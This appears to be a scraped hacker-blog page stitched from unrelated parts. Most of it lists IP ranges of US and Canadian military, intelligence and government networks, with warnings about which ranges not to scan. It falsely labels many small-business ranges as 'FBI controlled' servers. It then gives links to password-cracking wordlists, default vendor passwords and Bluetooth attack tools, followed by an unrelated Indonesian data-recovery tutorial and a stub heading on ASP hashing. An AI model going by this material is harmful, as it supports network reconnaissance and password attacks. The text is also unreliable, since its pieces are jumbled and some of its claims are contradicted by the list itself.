140.194.0.0 US Army Corps of Engineers
140.195.0.0 Naval Sea Systems Command
140.199.0.0 Naval Ocean Systems Center
140.201.0.0 HQ, 5th Signal Command
140.202.0.0 106TH SIGNAL BRIGADE

RANGE 143
143.45.0.0 58th Signal Battalion
143.46.0.0 U.S. Army, 1141st Signal Battalion
143.68.0.0 Headquarters, USAISC
143.69.0.0 Headquarters, USAAISC
143.70.0.0 Headquarters, USAAISC
143.71.0.0 Headquarters, USAAISC
143.72.0.0 Headquarters, USAAISC
143.73.0.0 Headquarters, USAAISC
143.74.0.0 Headquarters, USAAISC
143.75.0.0 Headquarters, USAAISC
143.76.0.0 Headquarters, USAAISC
143.77.0.0 Headquarters, USAAISC
143.78.0.0 Headquarters, USAAISC
143.79.0.0 Headquarters, USAAISC
143.80.0.0 Headquarters, USAAISC
143.81.0.0 Headquarters, USAAISC
143.82.0.0 Headquarters, USAAISC
143.84.0.0 Headquarters, USAAISC
143.85.0.0 Headquarters, USAAISC
143.86.0.0 Headquarters, USAAISC
143.87.0.0 Headquarters, USAAISC
143.232.0.0 NASA Ames Research Center

RANGE 144
144.99.0.0 United States Army Information Systems Command
144.109.0.0 Army Information Systems Command
144.143.0.0 Headquarters, Third United States Army
144.144.0.0 Headquarters, Third United States Army
144.146.0.0 Commander, Army Information Systems Center
144.147.0.0 Commander, Army Information Systems Center
144.170.0.0 HQ, 5th Signal Command
144.192.0.0 United States Army Information Services Command-Campbell
144.233.0.0 Defense Intelligence Agency
144.234.0.0 Defense Intelligence Agency
144.235.0.0 Defense Intelligence Agency
144.236.0.0 Defense Intelligence Agency
144.237.0.0 Defense Intelligence Agency
144.238.0.0 Defense Intelligence Agency
144.239.0.0 Defense Intelligence Agency
144.240.0.0 Defense Intelligence Agency
144.241.0.0 Defense Intelligence Agency
144.242.0.0 Defense Intelligence Agency
144.252.0.0 U.S. Army LABCOM

RANGE 146
146.17.0.0 HQ, 5th Signal Command
146.80.0.0 Defence Research Agency
146.98.0.0 HQ United States European Command
146.154.0.0 NASA/Johnson Space Center
146.165.0.0 NASA Langley Research Center

RANGE 147
147.35.0.0 HQ, 5th Signal Command
147.36.0.0 HQ, 5th Signal Command
147.37.0.0 HQ, 5th Signal Command
147.38.0.0 HQ, 5th Signal Command
147.39.0.0 HQ, 5th Signal Command
147.40.0.0 HQ, 5th Signal Command
147.42.0.0 Army CALS Project
147.103.0.0 Army Information Systems Software Center
147.104.0.0 Army Information Systems Software Center
147.159.0.0 Naval Air Warfare Center, Aircraft Division
147.168.0.0 Naval Surface Warfare Center
147.169.0.0 HQ, 5th Signal Command
147.198.0.0 Army Information Systems Command
147.199.0.0 Army Information Systems Command
147.238.0.0 Army Information Systems Command
147.239.0.0 1112th Signal Battalion
147.240.0.0 US Army Tank-Automotive Command
147.242.0.0 19th Support Command
147.248.0.0 Fort Monroe DOIM
147.254.0.0 7th Communications Group

RANGE 148
148.114.0.0 NASA, Stennis Space Center

RANGE 150
150.113.0.0 1114th Signal Battalion
150.114.0.0 1114th Signal Battalion
150.125.0.0 Space and Naval Warfare Command
150.133.0.0 10th Area Support Group
150.144.0.0 NASA Goodard Space Flight Center
150.149.0.0 Army Information Systems Command
150.157.0.0 USAISC-Fort Lee
150.184.0.0 Fort Monroe DOIM
150.190.0.0 USAISC-Letterkenny
150.196.0.0 USAISC-LABCOM

RANGE 152
152.82.0.0 7th Communications Group of the Air Force
152.151.0.0 U.S. Naval Space & Naval Warfare Systems Command
152.152.0.0 NATO Headquarters
152.154.0.0 Defense Information Systems Agency
152.229.0.0 Defense MegaCenter (DMC) Denver

RANGE 153
153.21.0.0 USCENTAF/SCM
153.22.0.0 USCENTAF/SCM
153.23.0.0 USCENTAF/SCM
153.24.0.0 USCENTAF/SCM
153.25.0.0 USCENTAF/SCM
153.26.0.0 USCENTAF/SCM
153.27.0.0 USCENTAF/SCM
153.28.0.0 USCENTAF/SCM
153.29.0.0 USCENTAF/SCM
153.30.0.0 USCENTAF/SCM
153.31.0.0 Federal Bureau of Investigation

RANGE 155
155.5.0.0 1141st Signal Bn
155.6.0.0 1141st Signal Bn
155.7.0.0 American Forces Information
155.8.0.0 U.S. ArmyFort Gordon
155.9.0.0 - 155.9.255.255 United States Army Information Systems Command
155.74.0.0 PEO STAMIS
155.75.0.0 US Army Corps of Engineers
155.76.0.0 PEO STAMIS
155.77.0.0 PEO STAMIS
155.78.0.0 PEO STAMIS
155.79.0.0 US Army Corps of Engineers
155.80.0.0 PEO STAMIS
155.81.0.0 PEO STAMIS
155.82.0.0 PEO STAMIS
155.83.0.0 US Army Corps of Enginers
155.84.0.0 PEO STAMIS
155.85.0.0 PEO STAMIS
155.86.0.0 US Army Corps of Engineers
155.87.0.0 PEO STAMIS
155.88.0.0 PEO STAMIS
155.96.0.0 Drug Enforcement Administration
155.149.0.0 1112th Signal Battalion
155.155.0.0 HQ, 5th Signal Command
155.178.0.0 Federal Aviation Administration
155.213.0.0 USAISC Fort Benning
155.214.0.0 Director of Information Management
155.215.0.0 USAISC-FT DRUM
155.216.0.0 TCACCIS Project Management Office
155.217.0.0 Directorate of Information Management
155.218.0.0 USAISC
155.219.0.0 DOIM/USAISC Fort Sill
155.220.0.0 USAISC-DOIM
155.221.0.0 USAISC-Ft Ord

RANGE 156
156.9.0.0 U. S. Marshals Service

RANGE 157
157.150.0.0 United Nations
157.153.0.0 COMMANDER NAVAL SURFACE U.S. PACIFIC FLEET
157.202.0.0 US Special Operations Command
157.217.0.0 U. S. Strategic Command

RANGE 158
158.1.0.0 Commander, Tooele Army Depot
158.2.0.0 USAMC Logistics Support Activity
158.3.0.0 U.S. Army TACOM
158.4.0.0 UASISC Ft. Carson
158.5.0.0 1112th Signal Battalion
158.6.0.0 USAISC-Ft. McCoy
158.7.0.0 USAISC-FLW
158.8.0.0 US Army Soldier Support Center
158.9.0.0 USAISC-CECOM
158.10.0.0 GOC
158.11.0.0 UASISC-Vint Hill
158.12.0.0 US Army Harry Diamond Laboratories
158.13.0.0 USAISC DOIM
158.14.0.0 1112th Signal Battalion
158.15.0.0 - 158.15.255.255 Defense Megacenter Huntsville
158.16.0.0 Rocky Mountain Arsenal (PMRMA)
158.17.0.0 Crane Army Ammunition Activity
158.18.0.0 Defense Finance & Accounting Service Center
158.19.0.0 DOIM
158.20.0.0 DOIM
158.235.0.0 Marine Corps Central Design and Programming Activity
158.243.0.0 Marine Corps Central Design and Programming Activity
158.244.0.0 Marine Corps Central Design and Programming Activity
158.245.0.0 Marine Corps Central Design and Programming Activity
158.246.0.0 Marine Corps Central Design and Programming Activity

RANGE 159
159.120.0.0 Naval Air Systems Command (Air 4114)

RANGE 160
160.132.0.0 US Army Recruiting Command
160.135.0.0 36th Signal BN
160.138.0.0 USAISC
160.139.0.0 USAISC
160.140.0.0 HQ, United States Army
160.143.0.0 USAISC
160.145.0.0 1101st Signal Brigade
160.146.0.0 USAISC SATCOMSTA-CAMP ROBERTS
160.150.0.0 Commander, Moncrief Army Hospital

RANGE 161
161.124.0.0 NAVAL WEAPONS STATION

RANGE 162
162.32.0.0 Naval Aviation Depot Pensacola
162.45.0.0 Central Intelligence Agency
162.46.0.0 Central Intelligence Agency

RANGE 163
163.205.0.0 NASA Kennedy Space Center
163.206.0.0 NASA Kennedy Space Center

RANGE 164
164.45.0.0 Naval Ordnance Center, Pacific Division
164.49.0.0 United States Army Space and Strategic Defense
164.158.0.0 Naval Surface Warfare Center
164.217.0.0 Institute for Defense Analyses
164.218.0.0 Bureau of Naval Personnel
164.219.0.0 HQ USAFE WARRIOR PREPARATION CENTER
164.220.0.0 - 164.220.255.255 NIMIP/TIP/NEWNET
164.221.0.0 - 164.221.255.255 Information Technology
164.223.0.0 Naval Undersea Warfare Center
164.224.0.0 Secretary of the Navy
164.225.0.0 U.S. Army Intelligence and Security Command
164.226.0.0 Naval Exchange Service Command
164.227.0.0 Naval Surface Warfare Center, Crane Division
164.228.0.0 USCINCPAC J21T
164.229.0.0 NCTS-NOLA
164.230.0.0 Naval Aviation Depot
164.231.0.0 Military Sealift Command
164.232.0.0 - 164.232.255.255 United States Southern Command

RANGE 167
167.44.0.0 Government Telecommunications Agency

RANGE 168
168.68.0.0 USDA Office of Operations
168.85.0.0 Fort Sanders Alliance
168.102.0.0 Indiana Purdue Fort Wayne

RANGE 169
169.252.0.0 - 169.253.0.0 U.S. Department of State

RANGE 194

RANGE 195
195.10.* Various - Do not scan

RANGE 199
199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA

RANGE 203
203.59.0.0 - 203.59.255.255 Perth Australia iiNET

RANGE 204
204.34.0.0 - 204.34.15.0 IPC JAPAN
204.34.0.0 - 204.37.255.0 DOD Network Information Center
204.34.16.0 - 204.34.27.0 Bureau of Medicine and Surgery
204.34.32.0 - 204.34.63.0 USACOM
204.34.64.0 - 204.34.115.0 DEFENSE FINANCE AND ACCOUNTING SERVICE
204.34.128.0 DISA-Eucom / BBN-STD, Inc.
204.34.129.0 Defense Technical Information Center
204.34.130.0 GSI
204.34.131.0 NSA NAPLES ITALY
204.34.132.0 NAVSTA ROTA SPAIN
204.34.133.0 NAS SIGONELLA ITALY
204.34.134.0 Naval Air Warfare Center Aircraft Division
204.34.135.0 GSI
204.34.136.0 Naval Undersea Warfare Center USRD - Orlando
204.34.137.0 Joint Spectrum Center
204.34.138.0 GSI
204.34.139.0 HQ, JFMO Korea, Headquarters
204.34.140.0 DISA D75
204.34.141.0 U. S. Naval Air Facility, Atsugi Japan
204.34.142.0 Naval Enlisted Personnel Management Center
204.34.143.0 Afloat Training Group Pacific
204.34.144.0 HQ Special Operations Command - Europe
204.34.145.0 Commander Naval Base Pearl Harbor
204.34.147.0 NAVSEA Information Management Improvement Program
204.34.148.0 Q112
204.34.149.0 Ctr. for Info. Sys.Security,CounterMeasures
204.34.150.0 Resource Consultants, Inc.
204.34.151.0 Personnel Support Activity, San Diego
204.34.152.0 NAVAL AIR FACILITY, ADAK
204.34.153.0 NAVSEA Logistics Command Detachment
204.34.154.0 PEARL HARBOR NAVAL SHIPYARD
204.34.155.0 PEARL HARBOR NAVAL SHIPYARD
204.34.156.0 Defense Photography School
204.34.157.0 - 204.34.160.0 Defense Information School
204.34.161.0 Naval Air Systems Command
204.34.162.0 Puget Sound Naval Shipyard
204.34.163.0 Joint Precision Strike Demonstration
204.34.164.0 Naval Pacific Meteorology and Ocean
204.34.165.0 Joint Precision Strike Demonstration
204.34.167.0 USAF
204.34.168.0 Commander
204.34.169.0 Naval Air Warfare Center
204.34.170.0 Naval Air Systems Command
204.34.171.0 NAVSTA SUPPLY DEPARTMENT
204.34.173.0 SUBMEPP Activity
204.34.174.0 COMMANDER TASK FORCE 74 YOKOSUKA JAPAN
204.34.176.0 DISA-PAC,IPC-GUAM
204.34.177.0 Satellite Production Test Center
204.34.181.0 940 Air Refueling Wing
204.34.182.0 Defense Megacenter Warner Robins
204.34.183.0 GCCS Support Facility
204.34.184.0 Nav Air Tech Serv Facility-Detachment
204.34.185.0 NAVAL SUPPORT FACILITY, DIEGO GARCIA
204.34.186.0 Defense Logistics Agency - Europe
204.34.187.0 NAVMASSO
204.34.188.0 Commander-In-Chief, US Pacific Fleet
204.34.189.0 Defense MegaCenter - St Louis
204.34.190.0 NAVMASSO
204.34.192.0 HQ SOCEUR
204.34.193.0 Second Marine Expeditionary Force
204.34.194.0 Second Marine Expeditionary Force
204.34.195.0 Second Marine Expeditionary Force
204.34.196.0 NAVCOMTELSTAWASHDC
204.34.197.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
204.34.198.0 Naval Observatory Detachment, Colorado
204.34.199.0 NAVILCODETMECH
204.34.200.0 Navy Environmental Preventive Medicine
204.34.201.0 Port Hueneme Division, Naval Surf
204.34.202.0 Naval Facilities Engineering Housing
204.34.203.0 NAVSEA Logistics Command Detachment
204.34.204.0 Naval Air Warfare Center
204.34.205.0 Portsmouth Naval Shipyard
204.34.206.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
204.34.208.0 - 204.34.210.0 Military Sealift Command Pacific
204.34.211.0 USAF Academy
204.34.212.0 3rd Combat Service Support
204.34.213.0 1st Radio Battalion
204.34.214.0 OASD (Health Affairs)
204.34.215.0 Second Marine Expeditionary Force
204.34.216.0 1st Marine Air Wing
204.34.217.0 SA-ALC/LTE
204.34.218.0 3rd Marine
204.34.219.0 Communications and Electronics
204.34.220.0 G-6 Operations
204.34.221.0 G-6 Operations
204.34.222.0 G-6 Operations
204.34.223.0 G-6 Operations
204.34.224.0 G-6 Operations
204.34.225.0 Joint Interoperability Test Command
204.34.226.0 NAVMASSO
204.34.227.0 NAVMASSO
204.34.228.0 - 204.34.228.255 Field Command Defense Nuclear Agency
204.34.229.0 Naval Space Command
204.34.230.0 Naval Pacific Meteorology and Oceanography
204.34.232.0 Military Family Housing
204.34.233.0 - 204.34.233.255 Navy Material Transportation Office
204.34.234.0 NAVMASSO
204.34.235.0 Defense Finance and Accounting Service
204.34.237.0 European Stars and Stripes
204.34.238.0 Pacific Stars and Stripes
204.34.239.0 PUGET SOUND NAVAL SHIPYARD
204.34.240.0 Nval Station, Guantanamo Bay
204.34.242.0 COMNAVSURFPAC
204.34.243.0 NAVMASSO
204.34.244.0 Amphibious Force, Seventh Fleet, U. S. Navy
204.34.245.0 USAF SpaceCommand
204.34.246.0 USAF
204.34.247.0 U.S. Army Special Operations Command
204.34.248.0 FLEET COMBAT TRAINING CENTER ATLA
204.34.249.0 Naval Aviation Depot North Island
204.34.250.0 NAVMASSO
204.34.251.0 NAVSEA Log Command Detachment Pacific
204.34.252.0 Command Special Boat Squadron One
204.34.253.0 AFPCA/GNNN
204.34.254.0 Navy Environmental Preventive Medicine

RANGE 205
205.0.0.0 - 205.117.255.0 Department of the Navy, Space and Naval
Warfare System Command, Washington DC - SPAWAR
205.96.* - 205.103.*

RANGE 207
207.30.* Sprint/United Telephone of Florida

All the below are FBI controlled Linux servers & IPs/IP-Ranges

207.60.0.0 - 207.60.255.0 The Internet Access Company
207.60.2.128 - 207.60.2.255 Abacus Technology
207.60.3.0 - 207.60.3.127 Mass Electric Construction Co.
207.60.3.128 - 207.60.3.255 Peabody Proberties Inc
207.60.4.0 - 207.60.4.127 Northern Electronics
207.60.4.128 - 207.60.4.255 Posternak, Blankstein & Lund
207.60.5.64 - 207.60.5.127 Woodard & Curran
207.60.5.192 - 207.60.5.255 On Line Services
207.60.6.0 - 207.60.6.63 The 400 Group
207.60.6.64 - 207.60.6.127 RD Hunter and Company
207.60.6.128 - 207.60.6.191 Louis Berger and Associates
207.60.6.192 - 207.60.6.255 Ross-Simons
207.60.7.0 - 207.60.7.63 Eastern Cambridge Savings Bank
207.60.7.64 - 207.60.7.127 Greater Lawrence Community Action Committee
207.60.7.128 - 207.60.7.191 Data Electronic Devices, Inc
207.60.8.0 - 207.60.8.255 Sippican
207.60.9.0 - 207.60.9.31 Alps Sportswear Mfg Co
207.60.9.32 - 207.60.9.63 Escher Group Ltd
207.60.9.64 - 207.60.9.95 West Suburban Elder
207.60.9.96 - 207.60.9.127 Central Bank
207.60.9.128 - 207.60.9.159 Danick Systems
207.60.9.160 - 207.60.9.191 Alps Sportswear Mfg CO
207.60.9.192 - 207.60.9.223 BSCC
207.60.13.16 - 207.60.13.23 Patrons Insurance Group
207.60.13.40 - 207.60.13.47 Athera Technologies
207.60.13.48 - 207.60.13.55 Service Edge Partners Inc
207.60.13.56 - 207.60.13.63 Massachusetts Credit Union League
207.60.13.64 - 207.60.13.71 SierraCom
207.60.13.72 - 207.60.13.79 AI/ FOCS
207.60.13.80 - 207.60.13.87 Extreme soft
207.60.13.96 - 207.60.13.103 Eaton Seo Corp
207.60.13.112 - 207.60.13.119 C. White
207.60.13.120 - 207.60.13.127 Athera
207.60.13.128 - 207.60.13.135 Entropic Systems, INC
207.60.13.136 - 207.60.13.143 Wood Product Manufactureds Associates
207.60.13.160 - 207.60.13.167 Jamestown Distribution
207.60.13.168 - 207.60.13.175 C&M Computers
207.60.13.176 - 207.60.13.183 ABC Used Auto Parts
207.60.13.184 - 207.60.13.191 Tomas Weldon
207.60.13.192 - 207.60.13.199 Tage Inns
207.60.13.200 - 207.60.13.207 Control Module Inc
207.60.13.208 - 207.60.13.215 Hyper Crawler Information Systems
207.60.13.216 - 207.60.13.223 Eastern Bearings
207.60.13.224 - 207.60.13.231 North Shore Data Services
207.60.13.232 - 207.60.13.239 Mas New Hampshire
207.60.14.0 - 207.60.14.255 J. A. Webster
207.60.15.0 - 207.60.15.127 Trilogic
207.60.16.0 - 207.60.16.255 Area 54
207.60.18.0 - 207.60.18.63 Vested Development Inc
207.60.18.64 - 207.60.18.127 Conventures
207.60.21.0 - 207.60.21.255 Don Law Company
207.60.22.0 - 207.60.22.255 Advanced Microsensors
207.60.28.0 - 207.60.28.63 Applied Business Center
207.60.28.64 - 207.60.28.127 Color and Design Exchange
207.60.36.8 - 207.60.36.15 Shaun McCusker
207.60.36.16 - 207.60.36.23 Town of Framingham
207.60.36.24 - 207.60.36.31 AB Software
207.60.36.32 - 207.60.36.39 Seabass Dreams Too Much, Inc
207.60.36.40 - 207.60.36.47 Next Ticketing
207.60.36.48 - 207.60.36.55 Dulsi
207.60.36.56 - 207.60.36.63 The Internet Access Company
207.60.36.64 - 207.60.36.71 Maguire Group
207.60.36.72 - 207.60.36.79 Cogenex
207.60.36.88 - 207.60.36.95 AKNDC
207.60.36.96 - 207.60.36.103 McGovern election commitee
207.60.36.104 - 207.60.36.111 Digital Equipment Corp
207.60.36.112 - 207.60.36.119 PTR - Precision Technologies
207.60.36.120 - 207.60.36.127 Extech
207.60.36.128 - 207.60.36.135 Manfreddi Architects
207.60.36.144 - 207.60.36.151 Parent Naffah
207.60.36.152 - 207.60.36.159 Darling Dolls Inc
207.60.36.160 - 207.60.36.167 Wright Communications
207.60.36.168 - 207.60.36.175 Principle Software
207.60.36.176 - 207.60.36.183 Chris Pet Store
207.60.36.184 - 207.60.36.191 Fifteen Lilies
207.60.36.192 - 207.60.36.199 All-Com Technologies
207.60.37.0 - 207.60.37.31 Cardio Thoracic Surgical Associates, P. A.
207.60.37.32 - 207.60.37.63 Preferred Fixtures Inc
207.60.37.64 - 207.60.37.95 Apple and Eve Distributors
207.60.37.96 - 207.60.37.127 Nelson Copy Supply
207.60.37.128 - 207.60.37.159 Boston Optical Fiber
207.60.37.192 - 207.60.37.223 Fantasia&Company
207.60.41.0 - 207.60.41.255 Infoactive
207.60.48.0 - 207.60.48.255 Curry College
207.60.62.32 - 207.60.62.63 Alternate Power Source
207.60.62.64 - 207.60.62.95 Keystone Howley-White
207.60.62.128 - 207.60.62.159 Bridgehead Associates LTD
207.60.62.160 - 207.60.62.191 County Supply
207.60.62.192 - 207.60.62.223 NH Board of Nursing
207.60.64.0 - 207.60.64.63 Diversified Wireless Technologies
207.60.64.64 - 207.60.64.127 Phytera
207.60.66.0 - 207.60.66.15 The Network Connection
207.60.66.16 - 207.60.66.31 Young Refrigeration
207.60.66.32 - 207.60.66.47 Vision Appraisal Technology
207.60.66.48 - 207.60.66.63 EffNet Inc
207.60.66.64 - 207.60.66.79 Entropic Systems Inc
207.60.66.80 - 207.60.66.95 Finley Properties
207.60.66.96 - 207.60.66.111 Nancy Plowman Associates
207.60.66.112 - 207.60.66.127 Northeast Financial Strategies
207.60.66.128 - 207.60.66.143 Textnology Corp
207.60.66.144 - 207.60.66.159 Groton Neochem LLC
207.60.66.160 - 207.60.66.175 Tab Computers
207.60.66.176 - 207.60.66.191 Patrons Insurance
207.60.66.192 - 207.60.66.207 Chair City Web
207.60.66.208 - 207.60.66.223 Radex, Inc.
207.60.66.224 - 207.60.66.239 Robert Austein
207.60.66.240 - 207.60.66.255 Hologic Inc.
207.60.71.64 - 207.60.71.127 K-Tech International Inc.
207.60.71.128 - 207.60.71.191 Pan Communications
207.60.71.192 - 207.60.71.255 New England College of Finance
207.60.75.128 - 207.60.75.255 Absolve Technology
207.60.78.0 - 207.60.78.127 Extech
207.60.78.128 - 207.60.78.255 The Insight Group
207.60.83.0 - 207.60.83.255 JLM Technologies
207.60.84.0 - 207.60.84.255 Strategic Solutions
207.60.94.0 - 207.60.94.15 McWorks
207.60.94.32 - 207.60.94.47 Rooney RealEstate
207.60.94.48 - 207.60.94.63 Joseph Limo Service
207.60.94.64 - 207.60.94.79 The Portico Group
207.60.94.80 - 207.60.94.95 Event Travel Management Inc
207.60.94.96 - 207.60.94.111 Intellitech International
207.60.94.128 - 207.60.94.143 Orion Partners
207.60.94.144 - 207.60.94.159 Rainbow Software Solution
207.60.94.160 - 207.60.94.175 Grason Stadler Inc
207.60.94.192 - 207.60.94.207 Donnegan System
207.60.95.1 - 207.60.95.255 The Iprax Corp
207.60.102.0 - 207.60.102.63 Coporate IT
207.60.102.64 - 207.60.102.127 Putnam Technologies
207.60.102.128 - 207.60.102.191 Sycamore Networks
207.60.102.192 - 207.60.102.255 Bostek
2?7.6?.10?.128 - 207.60.103.255 Louis Berger and Associates
207.60.104.128 - 207.60.104.191 Hanson Data Systems
207.60.106.128 - 207.60.106.255 Giganet Inc.
207.60.107.0 - 207.60.107.255 Roll Systems
207.60.108.8 - 207.60.108.15 InternetQA
207.60.111.0 - 207.60.111.31 Reading Cooperative Bank
207.60.111.32 - 207.60.111.63 Edco collaborative
207.60.111.64 - 207.60.111.95 DTC Communications Inc
207.60.111.96 - 207.60.111.127 Mike Line
207.60.111.128 - 207.60.111.159 The Steppingstone Foundation
207.60.111.160 - 207.60.111.191 Caton Connector
207.60.111.192 - 207.60.111.223 Refron
207.60.111.224 - 207.60.111.255 Dolabany Comm Group
207.60.112.0 - 207.60.112.255 The CCS Companies
207.60.116.0 - 207.60.116.255 Continental PET Technologies
207.60.122.16 - 207.60.122.23 Corey & Company Designers Inc
207.60.122.24 - 207.60.122.31 SAIC
207.60.122.32 - 207.60.122.39 Netserve Entertainment Group
207.60.122.40 - 207.60.122.47 Avici Systems Inc
207.60.122.48 - 207.60.122.55 Webrdwne
207.60.122.56 - 207.60.122.63 Reality and Wonder
207.60.122.64 - 207.60.122.71 Nishan Desilva
207.60.122.72 - 207.60.122.79 NemaSoft Inc
207.60.122.80 - 207.60.122.87 Patrick Murphy
207.60.122.88 - 207.60.122.95 Corey and Company
207.60.122.96 - 207.60.122.103 Ames Textile Corp
207.60.122.104 - 207.60.122.111 Publicom
207.60.127.0 - Northstar Technologies
207.60.128.0 - 207.60.128.255 Northstar Technologies
207.60.129.0 - 207.60.129.255 Sanga Corp
207.60.129.64 - 207.60.129.127 Fired Up Network
207.60.129.128 - 207.60.129.191 Integrated Data Solutions
207.60.129.192 - 207.60.129.255 Metanext
207.61.* WorldLinx Telecommunications, Inc., Canada
207.120.* BBN Planet, MA

RANGE 208
208.240.xxx.xxx

RANGE 209
209.35.* Interland, Inc., GA

RANGE 212
212.56.107.22
212.143 *** israelis isp's!! dont try those ranges!!
212.149.*** israelis isp's!! dont try those ranges!!
212.159.0.2
212.159.1.1
212.159.1.4
212.159.1.5
212.159.0.2
212.159.1.1
212.159.1.4
212.159.1.5
212.159.33.56
212.159.40.211
212.159.41.173
212.179.*** israelis isp's!! dont try those ranges!!
212.208.0.12.*** israelis isp's!! dont try those ranges!!

RANGE 213
213.8.***.*** israelis isp's!! dont try those ranges!!

RANGE 216
216.25.* 216.94.***.*** 216.247.* 216.248.*.* 217
217.6.* Do not scan

--------------------------------

And from our Canadian friends...

192.139.201.0 - 192.139.201.24 : Government of Canada
192.139.202.0 - 192.139.202.24 : Government of Canada
192.139.203.0 - 192.139.203.24 : Government of Canada
192.139.204.0 - 192.139.204.24 : Government of Canada
192.197.83.0 - 192.197.83.24 : Government of Canada
198.103.0.0 - 198.103.0.16 : Government of Canada

128.43.0.0 - 128.43.0.16 : Canadian Department of National Defense (DND)
131.132.0.0 - 131.132.0.16 : Canadian Department of National Defense (DND)
131.133.0.0 - 131.133.0.16 : Canadian Department of National Defense (DND)
131.134.0.0 - 131.134.0.16 : Canadian Department of National Defense (DND)
131.135.0.0 - 131.135.0.16 : Canadian Department of National Defense (DND)
131.136.0.0 - 131.136.0.16 : Canadian Department of National Defense (DND)
131.137.0.0 - 131.137.0.16 : Canadian Department of National Defense (DND)
131.138.0.0 - 131.138.0.16 : Canadian Department of National Defense (DND)
131.139.0.0 - 131.139.0.16 : Canadian Department of National Defense (DND)
131.140.0.0 - 131.140.0.16 : Canadian Department of National Defense (DND)
131.141.0.0 - 131.141.0.16 : Canadian Department of National Defense (DND)
192.5.144.0 - 192.5.144.24 : Canadian Department of National Defense (DND)
192.12.98.0 - 192.12.98.24 : Canadian Department of National Defense (DND)
192.12.215.0 - 192.12.215.24 : Canadian Department of National Defense
(DND)
192.16.205.0 - 192.16.205.24 : Canadian Department of National Defense
(DND)
192.16.206.0 - 192.16.206.24 : Canadian Department of National Defense
(DND)
192.16.207.0 - 192.16.207.24 : Canadian Department of National Defense
(DND)
192.16.208.0 - 192.16.208.24 : Canadian Department of National Defense
(DND)
192.16.242.0 - 192.16.242.24 : Canadian Department of National Defense
(DND)
192.16.243.0 - 192.16.243.24 : Canadian Department of National Defense
(DND)
192.35.144.0 - 192.35.144.24 : Canadian Department of National Defense
(DND)
192.42.68.0 - 192.42.68.24 : Canadian Department of National Defense (DND)

TCLH autor

Dictionary Files and Word Lists - Passlist

ftp://ftp.cerias.purdue.edu/pub/dict

ftp://ftp.ox.ac.uk/pub/wordlists

http://packetstormsecurity.nl/Crackers/wordlists

www.outpost9.com/files/WordLists.html

Default vendor passwords
www.cirt.net/cgi-bin/passwd.pl


by: http://hackersparadise.synthasite.com

Bluetooth Hacking Source

BlueScanner
www.networkchemistry.com/products/bluescanner.php

Bluesnarfer
www.alighieri.org/tools/bluesnarfer.tar.gz

BlueSniper rifle
www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt

Blooover
http://trifinite.org/trifinite_stuff_blooover.html

Bluejacking community site
www.bluejackq.com

Detailed presentation on the various Bluetooth attacks
http://trifinite.org/Downloads/21c3_Bluetooth_Hacking.pdf

NIST Special Publication 800-48
http://csrc.nist.gov/publications/nistpubs/800-48/NIST_SP_800-48.pdf

Mengembalikan Data Hilang - Recovery

Apakah Anda pernah secara tidak sengaja menghapus file Anda, kemudian sudah meng-empty recycle bin? Atau Anda telah mem-format hard disk tapi ingin data Anda kembali? Atau data hilang / rusak karena virus? Atau karena komputer mati atau restart tiba-tiba? Ada cara untuk mengembalikan data yang hilang, yaitu dengan satu software yang sangat lengkap, yaitu Ontrack EasyRecovery Professional. Inilah cara-cara mengembalikan data Anda yang hilang .

Pertama Anda harus download dulu software tersebut, silakan klik di sini untuk download software Ontrack Easy Recovery Professional. Pilih External Mirror #1.

Jika data Anda yang hilang di drive C:, sebaiknya install di komputer atau sistem operasi lain. Jika data yang hilang di drive selain C:, Anda bisa menginstall software ini di mana saja di komputer yang sama, asalkan tidak berada salam satu drive dengan data yang hilang tadi.
Software ini menyediakan sebuah solusi yang sangat komplit sehubungan dengan data yang hilang atau urusan recovery data yang hilang karena:
  1. Virus.
  2. Sektor yang tidak terbaca
  3. Kesalahan aplikasi, system, atau shut down yang tidak normal.
  4. Kerusakan pada critical area.
  5. Ter-format
  6. Penyebab lain yang memungkinkan hilangnya data.
Software ini di-install pada Windows 98 SE, Me, 2000, or XP, dan dapat me-recover data untuk pada semua sistem windows. Software ini memiliki empat feature utama, yaitu:
  1. Disk Diagnostics, yaitu tool untuk mengecek kondisi hardisk Anda apakah masih bagus atau tidak.
  2. Data Recovery, yaitu tool untuk mengembalikan data / file karena terhapus, terformat, dan sebagainya.
  3. Email Repair, yaitu tool untuk mengembalikan data email Outlook Express yang terhapus atau rusak.
  4. File Repair, yaitu tool untuk memperbaiki data / file Microsoft Word, Excel, Access, PowerPoint, dan ZIP (winzip) file yang rusak karena virus atau sebab lain.
Mari kita lihat satu per satu fasilitas yang ada dalam software ini.
Data hilang - Disk Diagnostics
Tool yang ada dalam Disk Diagnostics ini adalah:
  • Data Advisor, untuk membuat disket recovery.
  • Drive Tests, untuk mengetes kondisi fisik dari hard disk (disk drive).
  • Jumper Viewer, untuk melihat posisi jumper pada hard disk.
  • Partition Tests, untuk mengecek kondisi partisi hardisk.
  • Size Manager, untuk melihat kapasitas hard disk
  • SMART Tests, digunakan untuk mengetes kondisi Self-Monitoring, Analysis and Reporting Technology pada suatu hardisk.
Data hilang - data recovery
Tool-tool yang ada dalam Data Recovery ini adalah:
  • Advanced Recovery, untuk mencari data yang sudah tidak dapat di-recover dengan tool lain, yaitu karena ter-format, ter-partisi, virus, atau hal lain.
  • Deleted Recovery, untuk mencari data yang sudah dihapus. Ini adalah tool yang paling sering dipakai penulis.
  • Format Recovery, untuk mencari data pada hard disk yang sudah di-format.
  • Raw Recovery, untuk mencari file yang hilang berdasarkan signature.
  • Resume Recovery, semua proses recovery dapat dihentikan sementara dan dilanjutkan pada lain waktu.
  • Emergency Media, untuk membuat disket atau CD yang digunakan untuk me-recover data / file hilang.
3. Email Repair, digunakan untuk mengembalikan data email Outlook dan Outlook Express yang hilang.
Data hilang - email repair
4. File Repair, digunakan untuk mengembalikan file-file Microsoft Office dan ZIP yang rusak. Tool ini dapat memperbaiki file Microsoft Word, Excel, Access, PowerPoint, dan ZIP (winzip) file yang corrupt / rusak karena virus atau sebab lain.
Data hilang - file repair
Data atau file yang hilang lebih sulit di-recover jika:
  1. Anda menambahkan file baru setelah Anda menghapus atau memformat hard disk.
  2. Anda menggunakan FAT32 dalam Windows XP.
Demikian cara mengembalikan data yang hilang dengan software EasyRecovery Professional. Semoga data Anda bisa diselamatkan.

Rabu, 23 April 2008

Encrypting usernames and passwords .ASP

Using the md5 and sha1 hash functions

